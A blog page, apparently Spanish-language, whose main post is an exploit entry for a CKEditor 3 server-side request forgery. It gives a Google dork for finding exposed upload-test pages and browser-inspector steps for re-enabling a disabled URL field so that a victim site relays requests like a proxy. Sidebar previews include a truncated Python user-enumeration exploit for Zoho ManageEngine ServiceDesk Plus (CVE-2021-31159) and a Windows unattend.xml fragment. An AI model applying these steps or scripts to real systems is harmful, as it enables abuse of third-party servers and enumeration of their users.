# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html # Date: 12-6-2021 # Exploit Author: Blackangel # Software Link: https://ckeditor.com/ # Version:all version under 4 (1,2,3) # Tested on: windows 7 Steps of Exploit:- 1-using google dorks inurl /editor/filemanager/connectors/uploadtest.html 2-after going to vulnerable page you will find filed “Custom Uploader URL: ” 3-right click then choose inspect element, click on pick an element from the page , select field Custom Uploader URL: 4-in elements “<input id=”txtCustomUrl” style=”WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc” disabled=”” type=”text”>” delete disabled=”” 5-now you can put url start with any protocal 6-send it to the server as you see website that you have entered link is appear into page . what this mean??!!1 you send request to server using vulnerable website you can said i used it as proxy hackers ...
Entradas más populares de este blog
windows usuario
<?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="oobeSystem"> <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Reseal> <Mode>OOBE</Mode> </Reseal> </component> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <OOBE> <HideO...
# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3 . disable_warnings ( urllib3 . exceptions . InsecureRequestWarning ) def get_args ( ) : parser = argparse . ArgumentParser ( ) parser . add_argument ( '-d' , '--domain' , required = True , action = 'store' , help = 'Domain to attack' ) ...
Comentarios
Publicar un comentario